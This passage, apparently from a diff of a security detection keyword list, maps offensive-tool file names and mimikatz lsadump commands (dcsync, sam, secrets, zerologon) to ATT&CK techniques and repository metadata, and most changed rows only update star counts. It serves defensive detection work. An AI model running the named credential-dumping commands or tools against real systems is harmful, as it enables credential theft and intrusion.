T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*lookupsid.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*loot_memory.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*LordNoteworthy*","offensive_tool_keyword","Github Username","Github username of hacker known for malware pocs and windows exploitations","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/LordNoteworthy","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*lotus2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*lotus2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Lovely-Potato*","offensive_tool_keyword","Lovely-Potato","Lovely Potato (automating juicy potato) Powershell wrapper of Decoders JuicyPotato for easy exploitation. This entirely depends on the original Juicy Potato binary and utilizes his test_clsid.bat. another Local Privilege Escalation tool. from a Windows Service Accounts to NT AUTHORITY\SYSTEM","T1055 - T1547.002 - T1543.003 - T1059.001","TA0004 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/TsukiCTF/Lovely-Potato","1","0","N/A","N/A","2","131","29","2021-07-21T18:09:14Z","2019-05-17T19:37:20Z" "*lsa_decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*lsa_decryptor_nt*.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*lsa_secrets.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*lsa_secrets.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*lsadump.exe*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" -"*lsadump::*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::backupkeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::cache*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::changentlm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::dcshadow*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::dcsync*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::lsa*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::mbc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::netsync*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::packages*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::postzerologon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::RpData*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::sam*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::secrets*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::setntlm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*lsadump::zerologon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::backupkeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::cache*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::changentlm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::dcshadow*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::dcsync*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::lsa*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::mbc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::netsync*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::packages*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::postzerologon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::RpData*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::sam*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - 